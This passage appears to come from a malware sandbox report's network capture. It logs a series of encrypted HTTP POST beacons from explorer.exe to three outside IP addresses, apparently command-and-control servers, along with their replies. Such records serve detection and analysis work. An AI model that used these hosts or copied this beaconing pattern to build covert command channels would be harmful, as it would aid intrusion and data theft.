T5P/wDS1JcEdgwvNWL6Lq1et6z1qjcdsY0YWM5EFsbir+g3CrhxsqOcdsWREcZvhrWKdhtdlSuSB1+6bBk0d8Sb40rVXJnWP0Sjn5+sPw3ztWXPYGDWlDwM6D5H4e1Vrl3Ua2rK2XJkLpKjrI9Vpzjg6l90aBv6HAqHXwSv29/bGO938bvIHznWBZjCV6y3gvsPKzpXmxlH8v8BwzkZkrtannjQQpQ0rditWIpR4mu5NLDh9ZifIEvOLJuo3SvK
2024-07-24 17:58:10 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:10 UTC	685	IN	Data Raw: 62 48 32 30 31 45 37 37 37 49 6b 44 42 58 6f 4d 2b 77 53 4f 73 4e 34 6e 38 39 75 32 57 2f 6d 2f 70 32 73 69 57 49 68 55 32 79 57 35 33 32 57 6f 45 4e 44 55 32 34 78 75 73 4d 66 2b 2f 55 6d 53 54 41 30 78 63 37 54 2b 79 39 56 62 2b 41 49 39 79 4c 45 39 76 65 73 56 32 6d 53 4b 64 32 4b 6d 72 76 6f 72 6f 62 38 4d 6e 35 63 4a 56 42 79 77 34 34 49 58 66 5a 48 33 47 30 2b 31 63 72 37 6c 64 46 31 7a 35 6a 4e 57 70 70 77 32 6b 56 68 37 4c 48 35 33 56 43 6f 55 47 66 78 5a 52 57 7a 4a 52 67 4a 66 6c 71 4f 56 38 57 6c 6a 39 33 44 55 70 47 6d 31 69 4c 4b 4f 76 32 76 39 58 38 72 57 6b 50 65 6c 59 56 4a 67 72 75 48 72 4e 76 4f 71 2b 35 68 66 65 4f 34 76 53 70 2b 50 67 54 43 4c 35 4d 56 71 32 69 36 4f 4f 50 62 31 77 74 68 6a 52 44 62 73 55 44 4a 36 74 4a 4f 51 4f 37 54 Data Ascii: bH201E777IkDBXoM+wSOsN4n89u2W/m/p2siWIhU2yW532WoENDU24xusMf+/UmSTA0xc7T+y9Vb+AI9yLE9vesV2mSKd2Kmrvorob8Mn5cJVByw44IXfZH3G0+1cr7ldF1z5jNWppw2kVh7LH53VCoUGfxZRWzJRgJflqOV8Wlj93DUpGm1iLKOv2v9X8rWkPelYVJgruHrNvOq+5hfeO4vSp+PgTCL5MVq2i6OOPb1wthjRDbsUDJ6tJOQO7T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.10	49822	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:10 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:58:10 UTC	1267	OUT	Data Raw: 68 38 75 4c 56 70 48 4b 79 2b 78 31 44 43 72 6b 5a 74 64 35 74 2b 55 35 66 63 76 77 50 75 65 66 6e 6b 35 4a 6a 49 32 52 32 69 53 32 55 4d 4d 5a 79 34 67 51 5a 63 7a 77 50 6a 6a 46 61 4b 52 6b 48 46 51 45 4e 78 78 61 77 6e 57 63 50 32 2f 37 51 4d 79 52 36 46 54 43 65 34 64 78 4f 6f 59 46 6f 6d 59 6b 41 5a 68 5a 36 48 61 69 6a 38 39 74 6f 47 71 31 7a 30 38 6a 31 42 53 70 48 6c 37 39 59 72 49 4f 57 78 38 4f 65 47 68 5a 7a 58 66 30 6c 72 54 4f 32 78 53 72 37 4f 46 76 64 49 56 51 73 4b 77 33 43 53 74 48 2f 66 78 74 6b 36 4e 62 4f 50 51 49 58 35 4d 31 70 35 77 7a 54 72 66 4e 49 70 68 6f 39 7a 50 42 63 68 43 48 36 4b 31 4f 47 79 71 69 2b 51 32 53 31 35 4f 6b 7a 50 55 30 62 67 46 4b 4e 51 6e 6e 30 42 41 62 54 66 66 66 66 36 38 4e 6a 6f 43 4e 63 32 41 77 4e 34 2f Data Ascii: h8uLVpHKy+x1DCrkZtd5t+U5fcvwPuefnk5JjI2R2iS2UMMZy4gQZczwPjjFaKRkHFQENxxawnWcP2/7QMyR6FTCe4dxOoYFomYkAZhZ6Haij89toGq1z08j1BSpHl79YrIOWx8OeGhZzXf0lrTO2xSr7OFvdIVQsKw3CStH/fxtk6NbOPQIX5M1p5wzTrfNIpho9zPBchCH6K1OGyqi+Q2S15OkzPU0bgFKNQnn0BAbTffff68NjoCNc2AwN4/
2024-07-24 17:58:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:12 UTC	685	IN	Data Raw: 50 59 4c 44 65 59 4d 47 76 71 48 68 4d 54 55 33 79 66 53 73 59 57 66 71 6e 69 6d 41 69 51 4f 72 47 34 75 63 46 64 70 48 62 76 4a 7a 6a 6e 63 55 2b 65 36 6a 53 62 45 76 6a 32 58 2b 78 71 79 6d 47 6e 31 4b 69 57 65 37 4a 70 36 49 6b 44 42 57 30 72 5a 35 33 65 72 36 69 6c 41 56 77 44 38 45 53 61 38 58 37 68 4f 78 66 36 6f 4d 64 41 4a 58 4a 6e 59 59 7a 2f 58 30 45 6c 48 75 36 34 6d 46 30 57 54 30 77 31 77 30 79 36 6a 70 43 64 6f 67 51 4c 4c 34 59 63 70 65 4c 58 76 50 73 73 55 6d 41 51 59 73 79 61 6e 49 75 39 7a 42 50 72 4a 2b 59 66 33 55 66 77 79 64 54 56 66 6f 44 42 38 59 2f 4d 30 47 54 74 30 56 52 62 61 42 63 54 62 30 71 37 48 2b 54 5a 77 51 59 42 4e 4e 68 77 42 42 64 71 6b 61 41 42 5a 2f 66 4d 6c 65 74 58 79 59 78 7a 73 42 44 2f 78 49 31 43 30 47 38 4f 76 Data Ascii: PYLDeYMGvqHhMTU3yfSsYWfqnimAiQOrG4ucFdpHbvJzjncU+e6jSbEvj2X+xqymGn1KiWe7Jp6IkDBW0rZ53er6ilAVwD8ESa8X7hOxf6oMdAJXJnYYz/X0ElHu64mF0WT0w1w0y6jpCdogQLL4YcpeLXvPssUmAQYsyanIu9zBPrJ+Yf3UfwydTVfoDB8Y/M0GTt0VRbaBcTb0q7H+TZwQYBNNhwBBdqkaABZ/fMletXyYxzsBD/xI1C0G8Ov

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.10	49824	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:13 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:13 UTC	1122	OUT	Data Raw: 71 57 32 44 6a 4c 43 6e 6d 35 43 66 52 78 56 35 74 34 61 34 4a 65 2b 66 79 58 34 4e 5a 6f 4f 4b 7a 6b 56 4a 4e 45 4b 73 37 39 4f 2f 53 52 70 58 68 2b 74 73 32 78 32 6a 43 6a 38 41 56 46 59 47 67 51 47 75 66 4c 73 2f 4f 4c 2f 55 54 53 44 74 55 30 53 36 39 4a 67 4d 2b 33 35 69 75 45 37 39 39 70 43 52 69 71 74 4c 48 33 66 72 73 46 35 69 4e 33 74 41 64 57 62 63 49 77 32 75 6f 66 34 52 6a 51 78 63 47 39 2f 79 44 62 6e 7a 50 5a 30 46 4a 50 75 4b 46 2f 2f 62 69 68 33 6d 36 7a 32 59 37 69 44 57 30 4b 68 64 72 77 32 72 34 6b 52 55 41 2f 4e 41 6c 5a 2f 44 55 78 67 39 67 6f 41 47 57 45 78 77 73 57 71 6c 36 7a 58 36 6f 2b 32 42 41 37 68 6a 4b 51 78 65 59 5a 37 50 64 5a 75 79 4c 59 63 4a 38 77 58 79 37 35 45 74 70 56 77 49 36 6f 47 73 62 46 44 47 44 4c 33 33 76 59 61 Data Ascii: qW2DjLCnm5CfRxV5t4a4Je+fyX4NZoOKzkVJNEKs79O/SRpXh+ts2x2jCj8AVFYGgQGufLs/OL/UTSDtU0S69JgM+35iuE799pCRiqtLH3frsF5iN3tAdWbcIw2uof4RjQxcG9/yDbnzPZ0FJPuKF//bih3m6z2Y7iDW0Khdrw2r4kRUA/NAlZ/DUxg9goAGWExwsWql6zX6o+2BA7hjKQxeYZ7PdZuyLYcJ8wXy75EtpVwI6oGsbFDGDL33vYa
2024-07-24 17:58:14 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:14 UTC	685	IN	Data Raw: 53 75 77 78 75 6d 59 54 56 2b 71 54 75 6f 43 47 53 46 6b 42 6d 65 67 6d 62 54 55 70 64 50 75 6d 4c 66 6d 2b 74 2f 47 61 4d 56 41 56 72 68 44 49 53 44 49 59 48 2f 59 52 71 44 42 53 6e 31 54 2f 59 32 46 47 35 4e 35 34 56 4a 57 35 75 36 78 61 4e 53 37 79 4e 4a 70 2f 6f 4a 42 6c 4c 54 52 6e 72 6b 6f 50 5a 53 77 4f 57 4d 42 66 31 4e 50 39 49 6d 61 6d 65 73 4b 70 33 70 6b 6b 74 30 55 2b 66 72 67 7a 61 30 5a 39 77 46 58 2f 33 49 76 30 69 36 78 6e 70 6b 56 4b 78 2f 36 5a 76 32 51 30 37 4a 45 77 33 63 51 58 74 44 46 63 2f 6a 57 47 49 62 35 71 47 51 70 6a 4f 67 30 61 56 2b 6e 76 4e 69 46 54 35 77 67 68 38 57 46 78 59 59 43 56 77 72 51 7a 76 39 39 50 58 75 33 58 74 75 71 41 6a 69 4b 43 69 4a 75 52 55 4a 44 2f 55 48 46 79 34 75 74 4b 79 37 78 54 52 66 4c 33 54 6e 37 Data Ascii: SuwxumYTV+qTuoCGSFkBmegmbTUpdPumLfm+t/GaMVAVrhDISDIYH/YRqDBSn1T/Y2FG5N54VJW5u6xaNS7yNJp/oJBlLTRnrkoPZSwOWMBf1NP9ImamesKp3pkkt0U+frgza0Z9wFX/3Iv0i6xnpkVKx/6Zv2Q07JEw3cQXtDFc/jWGIb5qGQpjOg0aV+nvNiFT5wgh8WFxYYCVwrQzv99PXu3XtuqAjiKCiJuRUJD/UHFy4utKy7xTRfL3Tn7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.10	49826	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:14 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:14 UTC	1122	OUT	Data Raw: 70 50 32 56 38 5a 45 68 37 78 4b 41 41 7a 4e 41 76 2b 62 65 6b 66 6f 65 63 77 6f 75 75 33 63 68 75 7a 4a 57 73 51 4f 58 70 6a 6c 38 30 4a 61 41 47 6b 79 53 41 69 38 49 6b 62 6e 33 45 41 7a 66 4e 71 53 48 4f 4a 73 2b 69 76 6f 5a 6b 71 2b 57 34 50 6f 77 43 76 65 7a 62 46 54 67 38 73 6e 2f 32 6a 57 69 65 4f 63 51 73 73 74 36 6b 46 31 69 6e 38 71 4e 59 4a 6f 4a 4d 4f 45 36 47 51 42 63 78 51 7a 6b 39 43 68 48 73 30 64 33 37 49 6b 62 5a 69 44 4d 4f 35 47 4c 54 2b 6f 72 6a 48 51 34 6e 65 2b 65 6c 52 62 4f 6b 61 4d 4a 46 74 66 65 4f 45 55 75 54 6c 31 49 42 50 4f 4d 42 73 50 69 6e 55 62 45 72 44 53 5a 6a 37 41 38 4e 52 36 36 69 44 45 37 39 78 57 59 52 39 4b 71 36 33 36 78 65 4f 4e 30 61 58 7a 46 57 2b 6a 72 4a 6a 2b 35 6e 6c 35 67 51 5a 43 64 6a 42 47 51 76 71 4f Data Ascii: pP2V8ZEh7xKAAzNAv+bekfoecwouu3chuzJWsQOXpjl80JaAGkySAi8Ikbn3EAzfNqSHOJs+ivoZkq+W4PowCvezbFTg8sn/2jWieOcQsst6kF1in8qNYJoJMOE6GQBcxQzk9ChHs0d37IkbZiDMO5GLT+orjHQ4ne+elRbOkaMJFtfeOEUuTl1IBPOMBsPinUbErDSZj7A8NR66iDE79xWYR9Kq636xeON0aXzFW+jrJj+5nl5gQZCdjBGQvqO
2024-07-24 17:58:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:16 UTC	685	IN	Data Raw: 53 67 49 75 75 46 62 58 66 52 6a 66 67 38 35 49 2f 34 4b 37 70 69 59 6e 52 7a 45 68 31 44 31 54 61 6e 6e 57 7a 66 6b 69 7a 66 54 55 6e 69 49 6e 63 6f 6a 77 45 72 33 49 69 4c 67 2f 53 6f 4e 41 46 64 39 33 76 4b 30 41 5a 49 51 75 69 73 47 45 6c 63 38 6c 56 69 37 2b 48 55 72 75 6a 4e 63 64 38 4a 42 5a 44 51 64 61 66 37 2f 36 64 30 6a 67 4c 6e 66 54 6f 48 45 4c 77 34 48 79 4e 54 79 4a 4f 55 46 6b 65 34 53 6a 62 56 73 66 4f 76 79 7a 46 6f 68 59 6b 42 43 2f 43 4f 4c 4b 43 48 59 4f 43 4a 5a 7a 53 62 54 6d 72 4f 37 69 5a 37 5a 63 6b 78 74 57 4d 78 76 72 32 67 4d 79 56 39 35 49 73 55 6a 4a 71 65 64 50 4a 51 6b 5a 75 31 58 70 70 37 46 6d 64 6c 55 57 5a 41 41 50 39 50 61 36 55 39 6c 5a 69 59 73 34 41 52 63 70 2f 37 63 33 76 61 6d 72 43 34 7a 73 37 5a 5a 44 47 44 35 Data Ascii: SgIuuFbXfRjfg85I/4K7piYnRzEh1D1TannWzfkizfTUniIncojwEr3IiLg/SoNAFd93vK0AZIQuisGElc8lVi7+HUrujNcd8JBZDQdaf7/6d0jgLnfToHELw4HyNTyJOUFke4SjbVsfOvyzFohYkBC/COLKCHYOCJZzSbTmrO7iZ7ZckxtWMxvr2gMyV95IsUjJqedPJQkZu1Xpp7FmdlUWZAAP9Pa6U9lZiYs4ARcp/7c3vamrC4zs7ZZDGD5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.10	49827	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:16 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:16 UTC	1122	OUT	Data Raw: 4d 31 39 53 34 36 39 2f 2b 79 62 38 4e 65 39 52 52 42 71 4d 56 7a 55 66 6f 74 48 58 53 70 58 78 43 41 39 69 4d 68 4f 6c 43 34 6d 4a 54 47 47 5a 73 50 38 59 52 51 54 67 2b 4f 53 45 37 4e 64 43 36 4d 76 2f 45 4c 58 68 44 61 37 32 46 6d 49 4a 63 6f 4c 59 4b 35 4d 6a 45 62 75 57 6a 79 6a 42 38 39 69 36 72 37 51 6c 67 70 4d 35 6c 47 56 78 78 64 4c 67 43 37 31 36 77 4f 64 4c 76 70 56 57 50 46 6a 4f 79 42 6f 33 33 71 39 43 51 6a 44 50 7a 72 5a 78 77 61 41 31 42 5a 47 32 4d 57 34 52 6d 55 47 4f 6f 35 74 65 33 78 59 4f 53 32 69 75 4e 30 4d 73 64 58 4d 4b 43 52 39 4e 35 68 6e 59 36 68 68 32 6d 32 38 4e 54 52 2b 77 34 4c 56 49 2b 5a 6b 51 56 37 50 71 4c 6a 71 47 31 6e 4a 6f 49 32 41 33 51 54 70 41 35 2b 32 66 4f 4c 32 78 58 73 61 45 62 56 46 63 76 5a 45 56 75 54 53 Data Ascii: M19S469/+yb8Ne9RRBqMVzUfotHXSpXxCA9iMhOlC4mJTGGZsP8YRQTg+OSE7NdC6Mv/ELXhDa72FmIJcoLYK5MjEbuWjyjB89i6r7QlgpM5lGVxxdLgC716wOdLvpVWPFjOyBo33q9CQjDPzrZxwaA1BZG2MW4RmUGOo5te3xYOS2iuN0MsdXMKCR9N5hnY6hh2m28NTR+w4LVI+ZkQV7PqLjqG1nJoI2A3QTpA5+2fOL2xXsaEbVFcvZEVuTS
2024-07-24 17:58:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:18 UTC	685	IN	Data Raw: 47 42 6f 41 5a 69 4d 51 4d 6a 39 52 47 4c 70 59 4a 54 6a 57 33 33 37 72 57 70 53 36 55 46 64 72 41 4c 57 33 31 66 6c 6c 7a 32 77 62 52 74 6b 42 41 61 77 44 54 59 59 44 6b 64 36 79 6b 67 61 67 31 39 53 6c 36 70 44 6b 55 79 35 6b 2f 4d 46 32 64 4a 38 53 6f 7a 72 76 63 65 56 44 71 48 70 7a 4d 68 55 73 45 45 37 6d 4f 49 67 73 43 44 34 48 4b 65 50 69 62 63 50 79 78 37 33 48 50 4e 47 45 2f 39 65 42 4b 73 49 32 70 6d 51 72 78 35 6d 4f 48 77 45 35 6f 66 69 34 46 6b 56 74 6e 49 68 69 77 5a 2f 65 48 68 38 2b 37 75 76 2b 4b 4a 75 63 6c 37 6a 79 56 48 5a 6e 4b 36 79 67 6a 79 54 51 6f 50 55 53 75 2f 2b 55 69 30 54 6e 5a 6d 30 48 4b 35 44 33 6a 73 35 59 30 63 56 45 53 48 62 6a 6a 61 4c 65 75 6c 48 74 4c 31 45 44 31 74 6f 6b 6c 4f 50 6f 37 4c 73 71 6a 35 38 62 36 30 42 Data Ascii: GBoAZiMQMj9RGLpYJTjW337rWpS6UFdrALW31fllz2wbRtkBAawDTYYDkd6ykgag19Sl6pDkUy5k/MF2dJ8SozrvceVDqHpzMhUsEE7mOIgsCD4HKePibcPyx73HPNGE/9eBKsI2pmQrx5mOHwE5ofi4FkVtnIhiwZ/eHh8+7uv+KJucl7jyVHZnK6ygjyTQoPUSu/+Ui0TnZm0HK5D3js5Y0cVESHbjjaLeulHtL1ED1toklOPo7Lsqj58b60B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.10	49828	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:19 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:19 UTC	1122	OUT	Data Raw: 55 41 7a 39 55 57 53 4e 49 43 57 78 55 48 42 4b 52 72 2b 54 66 49 51 5a 53 39 32 44 4e 2b 6a 31 2b 7a 56 72 34 6a 37 57 30 61 69 37 78 39 6e 32 6f 6a 34 64 61 32 4b 46 4f 57 65 37 39 6e 55 2f 59 4b 32 34 44 54 2f 31 72 51 36 69 31 35 77 47 51 56 55 69 4b 65 4a 32 6e 61 4f 41 31 53 4f 71 4f 34 4c 69 6e 77 6e 57 38 6c 4a 4e 66 51 42 72 6a 2b 4a 4f 58 33 48 4a 47 6f 4e 4d 4a 55 55 5a 67 4b 4b 43 44 7a 75 49 76 6f 68 68 2b 5a 33 47 31 36 67 77 6a 6d 44 6c 78 4e 46 61 37 43 38 68 4f 56 69 33 58 7a 78 38 73 2f 7a 4d 69 35 63 49 34 79 6f 65 50 34 7a 74 47 64 36 33 48 56 2f 77 61 63 71 48 35 30 43 48 72 78 31 4d 74 78 71 71 6c 71 54 6e 66 78 70 79 70 61 6f 62 77 32 64 50 2f 43 4a 64 33 48 65 51 62 64 70 2b 37 42 79 72 4e 35 54 2f 30 4a 65 6c 6a 5a 31 5a 79 39 30 Data Ascii: UAz9UWSNICWxUHBKRr+TfIQZS92DN+j1+zVr4j7W0ai7x9n2oj4da2KFOWe79nU/YK24DT/1rQ6i15wGQVUiKeJ2naOA1SOqO4LinwnW8lJNfQBrj+JOX3HJGoNMJUUZgKKCDzuIvohh+Z3G16gwjmDlxNFa7C8hOVi3Xzx8s/zMi5cI4yoeP4ztGd63HV/wacqH50CHrx1MtxqqlqTnfxpypaobw2dP/CJd3HeQbdp+7ByrN5T/0JeljZ1Zy90
2024-07-24 17:58:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:19 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:20 UTC	685	IN	Data Raw: 47 44 52 6d 69 72 61 35 55 46 65 63 45 50 69 53 66 73 72 4f 4e 59 4f 51 36 34 2b 44 76 39 65 34 4e 69 52 55 42 65 78 31 43 6f 6e 71 72 56 4a 72 2b 47 74 4a 53 73 6e 2f 59 6a 79 30 37 6e 44 6d 71 7a 6d 78 58 4b 2b 5a 2f 38 47 39 52 6a 4c 4f 4e 36 42 6f 30 47 52 30 41 2b 74 6e 4d 78 71 66 77 67 48 30 55 56 48 6a 7a 53 7a 39 41 57 6d 4f 7a 6b 64 34 52 4b 4f 79 51 57 70 78 2b 4e 76 70 37 49 44 55 37 32 49 67 72 70 47 4c 35 6a 73 2f 70 52 44 64 66 64 66 5a 31 42 4e 68 36 49 61 72 4d 55 7a 55 41 67 6e 6a 4c 39 5a 4c 68 5a 5a 41 6a 33 6b 42 49 52 4a 79 78 6b 68 4d 2f 69 61 56 2b 74 55 77 44 6e 52 79 68 6a 68 64 7a 73 44 45 6e 4f 48 44 5a 4b 6e 39 30 47 4d 71 75 79 6d 61 50 66 33 51 6b 47 79 4a 44 36 41 2b 52 59 41 65 54 4f 34 6b 6c 79 66 5a 79 55 6f 59 39 35 50 Data Ascii: GDRmira5UFecEPiSfsrONYOQ64+Dv9e4NiRUBex1ConqrVJr+GtJSsn/Yjy07nDmqzmxXK+Z/8G9RjLON6Bo0GR0A+tnMxqfwgH0UVHjzSz9AWmOzkd4RKOyQWpx+Nvp7IDU72IgrpGL5js/pRDdfdfZ1BNh6IarMUzUAgnjL9ZLhZZAj3kBIRJyxkhM/iaV+tUwDnRyhjhdzsDEnOHDZKn90GMquymaPf3QkGyJD6A+RYAeTO4klyfZyUoY95P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.10	49829	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:20 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:20 UTC	1122	OUT	Data Raw: 52 49 67 57 42 78 79 37 73 41 43 63 2b 63 6d 48 39 35 4d 39 66 62 4f 62 4b 64 49 70 6c 30 46 58 71 41 68 6b 75 30 68 31 36 6d 4e 50 2b 30 68 6a 76 30 65 48 73 68 46 47 76 48 37 51 50 6c 34 2b 45 36 5a 4b 76 2b 44 74 5a 33 44 44 6f 77 37 73 64 79 6b 51 6c 6e 72 63 6e 44 49 4f 72 37 32 77 76 6a 45 6d 77 6d 6f 61 49 55 53 43 4f 32 53 56 75 78 44 62 38 39 2f 71 30 6b 52 69 55 51 58 7a 39 42 77 37 2b 6f 78 79 68 34 51 74 43 61 7a 52 49 4a 41 61 74 42 77 71 44 68 30 76 33 38 51 79 72 75 7a 38 6b 68 32 54 38 4e 61 6e 72 4e 6e 68 6f 79 63 59 5a 6e 47 75 69 6a 76 34 52 6c 34 54 72 46 4c 56 57 56 59 4d 65 2f 61 58 57 31 4c 73 69 58 65 39 65 6e 34 6c 51 67 6b 57 76 70 42 76 30 62 59 7a 46 48 76 4b 39 45 66 36 32 51 51 2b 49 76 67 76 4b 7a 74 49 50 35 38 68 5a 79 39 Data Ascii: RIgWBxy7sACc+cmH95M9fbObKdIpl0FXqAhku0h16mNP+0hjv0eHshFGvH7QPl4+E6ZKv+DtZ3DDow7sdykQlnrcnDIOr72wvjEmwmoaIUSCO2SVuxDb89/q0kRiUQXz9Bw7+oxyh4QtCazRIJAatBwqDh0v38Qyruz8kh2T8NanrNnhoycYZnGuijv4Rl4TrFLVWVYMe/aXW1LsiXe9en4lQgkWvpBv0bYzFHvK9Ef62QQ+IvgvKztIP58hZy9
2024-07-24 17:58:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:22 UTC	685	IN	Data Raw: 51 2b 39 63 36 42 53 4e 33 61 76 2f 73 73 4c 68 4e 76 47 52 43 79 41 57 51 34 4b 53 62 2b 55 66 5a 69 58 58 77 34 6a 69 36 78 47 56 46 71 37 70 77 30 44 47 68 69 31 57 42 54 4f 4e 58 70 6e 6a 6b 79 68 55 6f 6e 6c 6c 6d 6c 39 65 6d 66 36 4b 6d 72 39 59 48 74 69 46 6c 78 54 36 6b 36 6b 50 35 64 33 6c 33 42 43 56 49 50 75 74 59 59 59 54 68 45 66 65 32 47 4b 42 68 41 37 44 77 76 42 78 57 49 37 4c 4b 39 38 54 43 47 35 4a 2b 38 7a 45 51 45 6d 39 39 2f 39 74 30 66 6f 4e 69 69 2b 50 6c 71 63 72 47 56 56 35 41 68 73 71 65 75 4b 4b 56 4b 44 32 39 2b 48 49 4c 47 74 33 69 7a 62 7a 48 42 32 2b 66 52 7a 74 35 47 7a 6e 67 5a 74 2b 6f 73 77 61 4b 48 53 58 37 53 57 49 78 46 45 62 6e 59 63 78 56 52 66 38 59 37 73 51 4b 42 2b 6e 39 4a 73 64 2b 36 61 35 4a 36 64 4e 50 4e 76 Data Ascii: Q+9c6BSN3av/ssLhNvGRCyAWQ4KSb+UfZiXXw4ji6xGVFq7pw0DGhi1WBTONXpnjkyhUonllml9emf6Kmr9YHtiFlxT6k6kP5d3l3BCVIPutYYYThEfe2GKBhA7DwvBxWI7LK98TCG5J+8zEQEm99/9t0foNii+PlqcrGVV5AhsqeuKKVKD29+HILGt3izbzHB2+fRzt5GzngZt+oswaKHSX7SWIxFEbnYcxVRf8Y7sQKB+n9Jsd+6a5J6dNPNv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.10	49830	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:22 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:22 UTC	1122	OUT	Data Raw: 62 77 4f 4f 77 5a 48 41 2b 47 55 76 51 38 57 4e 70 69 4a 33 6f 30 77 77 69 6e 51 4b 58 52 4e 68 30 69 72 33 50 6c 32 34 58 7a 53 43 57 72 45 69 59 69 57 44 32 59 30 52 77 6a 30 44 36 66 50 44 5a 37 56 42 4f 53 65 78 6f 74 34 66 73 75 59 4e 53 6b 6a 57 4f 50 55 42 6a 66 59 67 4c 53 45 51 62 4b 6c 4c 32 65 6a 4b 56 69 36 34 54 79 46 6a 50 7a 39 50 6f 57 6a 34 33 6b 43 49 48 54 55 38 39 65 6d 55 6e 79 69 57 79 56 37 69 6e 37 36 68 78 2b 50 69 41 7a 55 4e 65 63 58 4b 37 74 5a 6b 76 33 6e 2b 76 78 47 6e 4d 6e 5a 66 4a 43 42 30 61 6f 57 2f 38 39 36 41 78 49 71 41 2b 67 68 4f 37 37 7a 73 63 53 41 39 66 6a 6b 48 38 71 6b 32 61 50 54 54 30 6a 58 54 2b 34 65 49 2b 41 6e 7a 6b 2f 51 31 69 49 49 58 6b 48 34 31 45 2f 58 45 35 36 53 66 32 66 6e 6b 70 2b 56 4c 47 61 75 Data Ascii: bwOOwZHA+GUvQ8WNpiJ3o0wwinQKXRNh0ir3Pl24XzSCWrEiYiWD2Y0Rwj0D6fPDZ7VBOSexot4fsuYNSkjWOPUBjfYgLSEQbKlL2ejKVi64TyFjPz9PoWj43kCIHTU89emUnyiWyV7in76hx+PiAzUNecXK7tZkv3n+vxGnMnZfJCB0aoW/896AxIqA+ghO77zscSA9fjkH8qk2aPTT0jXT+4eI+Anzk/Q1iIIXkH41E/XE56Sf2fnkp+VLGau
2024-07-24 17:58:25 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
